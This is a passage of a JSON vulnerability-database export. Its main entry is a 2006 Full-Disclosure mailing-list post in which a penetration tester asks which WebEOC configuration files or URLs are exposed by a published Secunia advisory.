"https://vulners.com/securityvulns/SECURITYVULNS:VULN:5976", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "Hi Guys,\r\n\r\n Doing a pen test I have come up with a WebEOC server. There are a few\r\nvulns listed at:\r\n\r\nhttp://secunia.com/advisories/16075/\r\n\r\nspecifically I am interested in :\r\n\r\n"6) Sensitive information is exposed in URIs, stored in publicly\r\naccessible configuration files, and in the HTML code returned to\r\nusers.\r\n\r\n7) A design error allows malicious users to access parts of the\r\napplication that they should not have access to by directly specifying\r\nthe URL."\r\n\r\nhowever I have been unable to find out what these files are called.\r\nAny information from people would be great. ESi have a demo on their\r\nsite, but it involves pretending to be interested in buying it and\r\ntalking to their sales guys.. so I figured I would ask here first.\r\n\r\nCheers.\r\nhf\r\n\r\n--\r\nparents will have to make sacrifices\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SECURITYVULNS:DOC:12090", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12090", "title": "[Full-disclosure] WebEOC Vuln - more info", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}